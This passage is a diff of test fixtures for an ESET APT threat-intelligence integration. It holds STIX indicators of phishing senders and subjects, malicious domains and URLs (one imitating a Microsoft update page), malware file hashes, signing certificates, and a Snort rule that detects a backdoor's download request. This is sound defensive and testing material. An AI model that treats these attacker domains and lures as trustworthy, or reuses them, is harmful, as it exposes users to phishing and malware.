"misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2023-09-29T17:58:54.000Z", "pattern": "[email-message:from_ref.value = 'katecohen1984@portugalmail.pt' AND email-message:subject = 'Hackers Leak Explicit Photos of More Than 100 Government workers']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-29T00:00:00Z"} +{"created": "2023-10-02T07:41:04.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--d9a10671-eb84-4039-8211-277c14104b39", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"url\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2023-10-02T07:41:04.000Z", "pattern": "[url:value = 'https://microsoft-update-com.github.io/kb5021042/' AND url:x_misp_scheme = 'https' AND url:x_misp_resource_path = '/kb5021042/' AND url:x_misp_port = '443']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-28T00:00:00Z"} +{"created": "2023-10-02T07:58:05.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--696f64c3-733b-4cba-8757-e0cb99142ffa", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"email\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2023-10-02T07:58:05.000Z", "pattern": "[email-message:x_misp_return_path = 'rosalawson1960@portugalmail.pt']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-10-02T07:58:05Z"} +{"created": "2023-10-03T08:15:57.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--a444021f-5c0a-4b59-a7af-c451edf05c2f", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "file"}], "labels": ["misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\""], "modified": "2023-10-03T08:15:57.000Z", "pattern": "[file:hashes.MD5 = '8a4c807caea1cd9d3552bed916320ee6' AND file:hashes.SHA1 = '5438e26e5f7d819ef4fcd39b84e575f4c452f234' AND file:hashes.SHA256 = '06e9dd33655ebc062a4236f2611403688baf0711b5a02acc45216ae853fad607' AND file:name = 'install-kb-5021042.cmd']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-29T10:46:00Z"} +{"created": "2023-10-02T13:48:17.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--8444ce6b-3c9e-4363-819a-5f64a238bcc7", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"domain-ip\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2023-10-02T13:48:17.000Z", "pattern": "[domain-name:value = 'billyconsult.com' AND domain-name:value = 'billyconsult.com']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2022-03-26T00:00:00Z", "valid_until": "2023-09-29T00:00:00Z"} +{"created": "2023-10-02T13:16:00.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--6602ac29-0cb3-4da9-b2dc-091b8a01ebfc", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"url\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2023-10-02T13:16:00.000Z", "pattern": "[url:value = 'https://billyconsult.com/wp-media.php' AND url:x_misp_scheme = 'https' AND url:x_misp_resource_path = '/wp-media.php' AND url:x_misp_port = '443']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2022-03-26T00:00:00Z", "valid_until": "2023-09-29T00:00:00Z"} +{"created": "2023-10-02T15:42:54.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--a013b792-6735-4ae4-ad1a-6ecfa9b1d216", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"domain-ip\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2023-10-02T15:42:54.000Z", "pattern": "[domain-name:value = 'brianrep.com' AND domain-name:value = 'brianrep.com']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-05-05T00:00:00Z", "valid_until": "2023-09-28T00:00:00Z"} +{"created": "2023-10-02T15:46:12.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--e8d72126-34cd-4ef0-ad5f-b5d449e5a5e3", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"url\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2023-10-02T15:46:12.000Z", "pattern": "[url:value = 'https://brianrep.com/dnquery.php' AND url:x_misp_scheme = 'https' AND url:x_misp_resource_path = '/dnquery.php' AND url:x_misp_port = '443']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-05-05T00:00:00Z", "valid_until": "2023-09-28T00:00:00Z"} +{"created": "2023-10-02T12:10:47.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--c079b60b-dd07-4c3c-b9b8-63573708bcdc", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"x509\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2023-10-02T12:10:47.000Z", "pattern": "[x509-certificate:hashes.MD5 = '0a2fd4d1cdc852678a40cbccfd4b7fbd' AND x509-certificate:hashes.SHA1 = 'f23372e12d37178544acd7448f469ccaf71ad244' AND x509-certificate:hashes.SHA256 = '472b1939ed7df19bad95512e63ca44aac4d95a7109d31f98a042e45c37a5a630' AND x509-certificate:issuer = 'C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Extended Validation Code Signing CA' AND x509-certificate:serial_number = '00c74f79c78393ebf22858e9ad3914567f' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.11' AND x509-certificate:subject = 'serialNumber=SC331902, ??=GB, ??=Private Organization, C=GB, postalCode=ML12 6HQ, ST=Scottish Borders, L=Broughton, ??=Galavale, O=SimpleHelp Ltd, CN=SimpleHelp Ltd' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2024-02-25 23:59:59+00:00' AND x509-certificate:validity_not_before = '2021-02-25 00:00:00+00:00']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-10-02T12:10:47Z"} diff --git a/packages/ti_eset/data_stream/apt/_dev/test/pipeline/test-eset-ndjson.log-expected.json b/packages/ti_eset/data_stream/apt/_dev/test/pipeline/test-eset-ndjson.log-expected.json new file mode 100644 index 00000000000..4e864010e8c --- /dev/null +++ b/packages/ti_eset/data_stream/apt/_dev/test/pipeline/test-eset-ndjson.log-expected.json @@ -0,0 +1,1366 @@ +{ + "expected": [ + { + "@timestamp": "2024-03-14T18:52:26.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--00c84e90-4e2b-41a5-97e8-0b5f40cce015", + "meta_category": "network", + "name": "x509", + "valid_until": "2025-03-14T18:52:26.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2024-03-14T18:52:26.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--00c84e90-4e2b-41a5-97e8-0b5f40cce015\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"x509\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2024-03-14T18:52:26.000Z\", \"pattern\": \"[x509-certificate:hashes.MD5 = '4ede38dcb043138971c429eaaa2d4696' AND x509-certificate:hashes.SHA1 = '28f9a8e7601f5338bf6e194151a718608c0124a8' AND x509-certificate:hashes.SHA256 = '23d13a8e48a6eff191a5d6a0635b99467c2e7242ae520479cae130fbd41cc645' AND x509-certificate:issuer = 'C=GB, O=Sectigo Limited, CN=Sectigo Public Code Signing CA R36' AND x509-certificate:serial_number = '0139dde119bb320dfb9f5defe3f71245' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.12' AND x509-certificate:subject = 'C=KR, ST=Seoul, O=Hangil IT Co.\\\\\\\\, Ltd, CN=Hangil IT Co.\\\\\\\\, Ltd' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2024-11-09 23:59:59+00:00' AND x509-certificate:validity_not_before = '2021-11-10 00:00:00+00:00']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"2.1\", \"type\": \"indicator\", \"valid_from\": \"2024-03-14T18:52:26Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "4ede38dcb043138971c429eaaa2d4696", + "sha1": "28f9a8e7601f5338bf6e194151a718608c0124a8", + "sha256": "23d13a8e48a6eff191a5d6a0635b99467c2e7242ae520479cae130fbd41cc645" + } + }, + "last_seen": "2024-03-14T18:52:26.000Z", + "modified_at": "2024-03-14T18:52:26.000Z", + "provider": "eset", + "type": "x509-certificate", + "x509": { + "issuer": { + "common_name": [ + "Sectigo Public Code Signing CA R36" + ], + "country": [ + "GB" + ], + "distinguished_name": "C=GB, O=Sectigo Limited, CN=Sectigo Public Code Signing CA R36", + "organization": [ + "Sectigo Limited" + ] + }, + "not_after": "2024-11-09T23:59:59.000Z", + "not_before": "2021-11-10T00:00:00.000Z", + "serial_number": "0139dde119bb320dfb9f5defe3f71245", + "signature_algorithm": "1.2.840.113549.1.1.12", + "subject": { + "common_name": [ + "Hangil IT Co.\\\\, Ltd" + ], + "country": [ + "KR" + ], + "distinguished_name": "C=KR, ST=Seoul, O=Hangil IT Co.\\\\, Ltd, CN=Hangil IT Co.\\\\, Ltd", + "organization": [ + "Hangil IT Co.\\\\, Ltd" + ], + "state_or_province": [ + "Seoul" + ] + }, + "version_number": "3" + } + } + } + }, + { + "@timestamp": "2024-03-14T19:02:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--5467bc9d-6cec-487b-8584-8228ed4ba5c5", + "meta_category": "network", + "name": "domain-ip", + "valid_until": "2025-03-14T19:02:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2024-03-14T19:02:03.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--5467bc9d-6cec-487b-8584-8228ed4ba5c5\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"domain-ip\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2024-03-14T19:02:03.000Z\", \"pattern\": \"[domain-name:resolves_to_refs[*].value = '141.164.63.254']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"2.1\", \"type\": \"indicator\", \"valid_from\": \"2024-03-14T19:02:03Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "last_seen": "2024-03-14T19:02:03.000Z", + "modified_at": "2024-03-14T19:02:03.000Z", + "provider": "eset", + "type": "domain-name", + "url": { + "original": "141.164.63.254" + } + } + } + }, + { + "@timestamp": "2024-01-15T15:52:02.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--cba9e1c4-cb8a-4332-8193-7a663542d8ad", + "meta_category": "network", + "name": "x509", + "valid_until": "2025-01-14T15:52:02.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\":\"2024-01-15T15:52:02.000Z\",\"created_by_ref\":\"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\",\"id\":\"indicator--cba9e1c4-cb8a-4332-8193-7a663542d8ad\",\"kill_chain_phases\":[{\"kill_chain_name\":\"misp-category\",\"phase_name\":\"network\"}],\"labels\":[\"misp:name=\\\"x509\\\"\",\"misp:meta-category=\\\"network\\\"\",\"misp:to_ids=\\\"True\\\"\"],\"modified\":\"2024-01-15T15:52:02.000Z\",\"pattern\":\"[x509-certificate:hashes.MD5 = '71b91c0a53cfc3515e45c8c3b72f88c0' AND x509-certificate:hashes.SHA1 = '30db7d678045e44d882d7652ba6aaa6593c02328' AND x509-certificate:hashes.SHA256 = '37320e24baa50e63b0a1dfe513922333d5a622254a4b2bcd116a24f43e52a101' AND x509-certificate:issuer = 'C=GB, O=Sectigo Limited, CN=Sectigo Public Code Signing CA R36' AND x509-certificate:serial_number = '008890cab1cd510cd20dab4ce5948cbc3a' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.12' AND x509-certificate:subject = 'C=KR, ST=Gyeonggi-do, O=D2innovation Co.,LTD, CN=D2innovation Co.,LTD' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2025-04-03 23:59:59+00:00' AND x509-certificate:validity_not_before = '2023-03-02 00:00:00+00:00']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2024-01-15T15:52:02Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "71b91c0a53cfc3515e45c8c3b72f88c0", + "sha1": "30db7d678045e44d882d7652ba6aaa6593c02328", + "sha256": "37320e24baa50e63b0a1dfe513922333d5a622254a4b2bcd116a24f43e52a101" + } + }, + "last_seen": "2024-01-15T15:52:02.000Z", + "modified_at": "2024-01-15T15:52:02.000Z", + "provider": "eset", + "type": "x509-certificate", + "x509": { + "issuer": { + "common_name": [ + "Sectigo Public Code Signing CA R36" + ], + "country": [ + "GB" + ], + "distinguished_name": "C=GB, O=Sectigo Limited, CN=Sectigo Public Code Signing CA R36", + "organization": [ + "Sectigo Limited" + ] + }, + "not_after": "2025-04-03T23:59:59.000Z", + "not_before": "2023-03-02T00:00:00.000Z", + "serial_number": "008890cab1cd510cd20dab4ce5948cbc3a", + "signature_algorithm": "1.2.840.113549.1.1.12", + "subject": { + "country": [ + "KR" + ], + "distinguished_name": "C=KR, ST=Gyeonggi-do, O=D2innovation Co.,LTD, CN=D2innovation Co.,LTD", + "organization": [ + "D2innovation Co." + ], + "state_or_province": [ + "Gyeonggi-do" + ] + }, + "version_number": "3" + } + } + } + }, + { + "@timestamp": "2024-01-15T17:05:32.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--24fda7c8-a33c-4350-ba3f-495c887b9fe2", + "meta_category": "network", + "name": "x509", + "valid_until": "2025-01-14T17:05:32.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\":\"2024-01-15T17:05:32.000Z\",\"created_by_ref\":\"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\",\"id\":\"indicator--24fda7c8-a33c-4350-ba3f-495c887b9fe2\",\"kill_chain_phases\":[{\"kill_chain_name\":\"misp-category\",\"phase_name\":\"network\"}],\"labels\":[\"misp:name=\\\"x509\\\"\",\"misp:meta-category=\\\"network\\\"\",\"misp:to_ids=\\\"True\\\"\"],\"modified\":\"2024-01-15T17:05:32.000Z\",\"pattern\":\"[x509-certificate:hashes.MD5 = 'ed8893f16d887956e6a8a433645655fc' AND x509-certificate:hashes.SHA1 = '1ce0c3a55850c7e3f6b904b73e856e414b8293d1' AND x509-certificate:hashes.SHA256 = 'f62a815522470f8c12fac55510d367359f56aaadb530f63520df6c21a6c3c00a' AND x509-certificate:issuer = 'C=US, O=DigiCert\\\\\\\\, Inc., CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1' AND x509-certificate:serial_number = '0187a16b5e3a704b7fcab2598f50005a' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.11' AND x509-certificate:subject = '??=Private Organization, ??=CN, ??=, ??=, serialNumber=91370211065081921M, C=CN, ST=, L=, O=, CN=' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2022-11-29 23:59:59+00:00' AND x509-certificate:validity_not_before = '2021-11-29 00:00:00+00:00']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2024-01-15T17:05:32Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "ed8893f16d887956e6a8a433645655fc", + "sha1": "1ce0c3a55850c7e3f6b904b73e856e414b8293d1", + "sha256": "f62a815522470f8c12fac55510d367359f56aaadb530f63520df6c21a6c3c00a" + } + }, + "last_seen": "2024-01-15T17:05:32.000Z", + "modified_at": "2024-01-15T17:05:32.000Z", + "provider": "eset", + "type": "x509-certificate", + "x509": { + "issuer": { + "common_name": [ + "DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1" + ], + "country": [ + "US" + ], + "distinguished_name": "C=US, O=DigiCert\\\\, Inc., CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1", + "organization": [ + "DigiCert\\\\, Inc." + ] + }, + "not_after": "2022-11-29T23:59:59.000Z", + "not_before": "2021-11-29T00:00:00.000Z", + "serial_number": "0187a16b5e3a704b7fcab2598f50005a", + "signature_algorithm": "1.2.840.113549.1.1.11", + "subject": { + "country": [ + "CN" + ], + "distinguished_name": "??=Private Organization, ??=CN, ??=, ??=, serialNumber=91370211065081921M, C=CN, ST=, L=, O=, CN=" + }, + "version_number": "3" + } + } + } + }, + { + "@timestamp": "2023-11-17T19:00:49.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--16425bff-e5ba-4096-8883-0b340e892c45", + "meta_category": "network", + "name": "x509", + "valid_until": "2024-11-16T19:00:49.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-11-17T19:00:49.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--16425bff-e5ba-4096-8883-0b340e892c45\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"x509\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-11-17T19:00:49.000Z\", \"pattern\": \"[x509-certificate:hashes.MD5 = '8ad6881721a82127b46fd5d07a1fab4b' AND x509-certificate:hashes.SHA1 = '9ebf592dd04da5274f1db1da41ab1434dd4c6aa1' AND x509-certificate:hashes.SHA256 = 'd3afddb5c8287ad7caf8bfe1dcc6be0cb4242f765ca9ee838c133736da43b324' AND x509-certificate:issuer = 'C=US, ST=Texas, L=Houston, O=SSL Corp, CN=SSL.com EV Code Signing Intermediate CA RSA R3' AND x509-certificate:serial_number = '47f49de6c7e29352e9f0775f68e15d8b' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.11' AND x509-certificate:subject = 'C=US, ST=North Carolina, L=Asheville, O=Level Software\\\\\\\\\\\\\\\\, Inc., OU=Information Security, serialNumber=7647497, CN=Level Software\\\\\\\\\\\\\\\\, Inc., ??=Private Organization, ??=Delaware, ??=US' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2024-09-19 11:51:47+00:00' AND x509-certificate:validity_not_before = '2022-09-20 11:51:47+00:00']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-11-17T19:00:49Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "8ad6881721a82127b46fd5d07a1fab4b", + "sha1": "9ebf592dd04da5274f1db1da41ab1434dd4c6aa1", + "sha256": "d3afddb5c8287ad7caf8bfe1dcc6be0cb4242f765ca9ee838c133736da43b324" + } + }, + "last_seen": "2023-11-17T19:00:49.000Z", + "modified_at": "2023-11-17T19:00:49.000Z", + "provider": "eset", + "type": "x509-certificate", + "x509": { + "issuer": { + "common_name": [ + "SSL.com EV Code Signing Intermediate CA RSA R3" + ], + "country": [ + "US" + ], + "distinguished_name": "C=US, ST=Texas, L=Houston, O=SSL Corp, CN=SSL.com EV Code Signing Intermediate CA RSA R3", + "locality": [ + "Houston" + ], + "organization": [ + "SSL Corp" + ], + "state_or_province": [ + "Texas" + ] + }, + "not_after": "2024-09-19T11:51:47.000Z", + "not_before": "2022-09-20T11:51:47.000Z", + "serial_number": "47f49de6c7e29352e9f0775f68e15d8b", + "signature_algorithm": "1.2.840.113549.1.1.11", + "subject": { + "common_name": [ + "Level Software\\\\\\\\, Inc." + ], + "country": [ + "US" + ], + "distinguished_name": "C=US, ST=North Carolina, L=Asheville, O=Level Software\\\\\\\\, Inc., OU=Information Security, serialNumber=7647497, CN=Level Software\\\\\\\\, Inc., ??=Private Organization, ??=Delaware, ??=US", + "locality": [ + "Asheville" + ], + "organization": [ + "Level Software\\\\\\\\, Inc." + ], + "organizational_unit": [ + "Information Security" + ], + "state_or_province": [ + "North Carolina" + ] + }, + "version_number": "3" + } + } + } + }, + { + "@timestamp": "2023-11-01T04:41:36.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "category": "Network activity", + "id": "indicator--fe5a0018-b2dc-4102-a100-4632efc58ab4", + "type": "snort", + "valid_until": "2024-10-31T04:41:36.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-11-01T04:41:36.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--fe5a0018-b2dc-4102-a100-4632efc58ab4\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"Network activity\"}], \"labels\": [\"misp:type=\\\"snort\\\"\", \"misp:category=\\\"Network activity\\\"\"], \"modified\": \"2023-11-01T04:41:36.000Z\", \"pattern\": \"[alert tcp any any -> any 80 \\\\\\r\\n (msg:\\\"Matches HTTP GET request by NSPX30's orchestrator when obtaining the backdoor.\\\"; gid:45534554; sid:45030002; rev:1;\\\\\\r\\n metadata: author \\\"ESET Research\\\", date \\\"2023-10-31\\\", hash \\\"82295E138E89F37DD0E51B1723775CBE33D26475\\\",\\\\\\r\\n copyright \\\"ESET Research\\\", distribution \\\"Distribution is forbidden. Do not upload to any multi-scanner or share on any threat intel platform.\\\";\\\\\\r\\n content: \\\"GET /id=\\\"; content: \\\"User-Agent: Mozilla/4.0 (compatible\\\\;MSIE 5.0\\\\; Windows 98)|0d 0a|Host: www.baidu.com|0d 0a|\\\";)]\", \"pattern_type\": \"snort\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-11-01T04:41:36Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "last_seen": "2023-11-01T04:41:36.000Z", + "modified_at": "2023-11-01T04:41:36.000Z", + "provider": "eset" + } + } + }, + { + "@timestamp": "2023-09-29T09:12:42.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--561b64fa-5223-46f9-8f6c-75cafe96b97b", + "meta_category": "network", + "name": "domain-ip", + "valid_until": "2024-09-28T09:12:42.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-09-29T09:12:42.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--561b64fa-5223-46f9-8f6c-75cafe96b97b\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"domain-ip\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-09-29T09:12:42.000Z\", \"pattern\": \"[domain-name:value = 'acertab.info']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-14T11:39:37Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "last_seen": "2023-09-29T09:12:42.000Z", + "modified_at": "2023-09-29T09:12:42.000Z", + "provider": "eset", + "type": "domain-name", + "url": { + "original": "acertab.info" + } + } + } + }, + { + "@timestamp": "2023-09-29T08:48:51.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--f8452e88-655f-4b5e-9812-2a1b3f5607cf", + "meta_category": "network", + "name": "x509", + "valid_until": "2024-09-28T08:48:51.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-09-29T08:48:51.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--f8452e88-655f-4b5e-9812-2a1b3f5607cf\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"x509\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-09-29T08:48:51.000Z\", \"pattern\": \"[x509-certificate:hashes.MD5 = 'ef36b08d59b9a6b2f538c1d24967fa23' AND x509-certificate:hashes.SHA1 = '0cd26ef0b232e6ed9910733e1d175a80a083aa08' AND x509-certificate:hashes.SHA256 = 'e4e82449c6a99740cd80fcc0368c93986bb3645fb6a9bfdae03e5d28ac4a66d8' AND x509-certificate:issuer = 'C=GB, O=Sectigo Limited, CN=Sectigo Public Code Signing CA R36' AND x509-certificate:serial_number = '3bd92ce9987095f74623d7c37e8d344e' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.12' AND x509-certificate:subject = 'C=GB, ST=London, O=GREATIV LIMITED, CN=GREATIV LIMITED' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2024-05-09 23:59:59+00:00' AND x509-certificate:validity_not_before = '2023-05-10 00:00:00+00:00']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-29T08:48:51Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "ef36b08d59b9a6b2f538c1d24967fa23", + "sha1": "0cd26ef0b232e6ed9910733e1d175a80a083aa08", + "sha256": "e4e82449c6a99740cd80fcc0368c93986bb3645fb6a9bfdae03e5d28ac4a66d8" + } + }, + "last_seen": "2023-09-29T08:48:51.000Z", + "modified_at": "2023-09-29T08:48:51.000Z", + "provider": "eset", + "type": "x509-certificate", + "x509": { + "issuer": { + "common_name": [ + "Sectigo Public Code Signing CA R36" + ], + "country": [ + "GB" + ], + "distinguished_name": "C=GB, O=Sectigo Limited, CN=Sectigo Public Code Signing CA R36", + "organization": [ + "Sectigo Limited" + ] + }, + "not_after": "2024-05-09T23:59:59.000Z", + "not_before": "2023-05-10T00:00:00.000Z", + "serial_number": "3bd92ce9987095f74623d7c37e8d344e", + "signature_algorithm": "1.2.840.113549.1.1.12", + "subject": { + "common_name": [ + "GREATIV LIMITED" + ], + "country": [ + "GB" + ], + "distinguished_name": "C=GB, ST=London, O=GREATIV LIMITED, CN=GREATIV LIMITED", + "organization": [ + "GREATIV LIMITED" + ], + "state_or_province": [ + "London" + ] + }, + "version_number": "3" + } + } + } + }, + { + "@timestamp": "2023-09-29T09:00:06.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--79d1df7c-8830-462d-bdf7-cea8a3911a01", + "meta_category": "file", + "name": "file", + "valid_until": "2024-09-28T09:00:06.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-09-29T09:00:06.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--79d1df7c-8830-462d-bdf7-cea8a3911a01\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"file\"}], \"labels\": [\"misp:name=\\\"file\\\"\", \"misp:meta-category=\\\"file\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-09-29T09:00:06.000Z\", \"pattern\": \"[file:hashes.MD5 = 'd7519b822434fb89fb3643bc2f450e23' AND file:hashes.SHA1 = 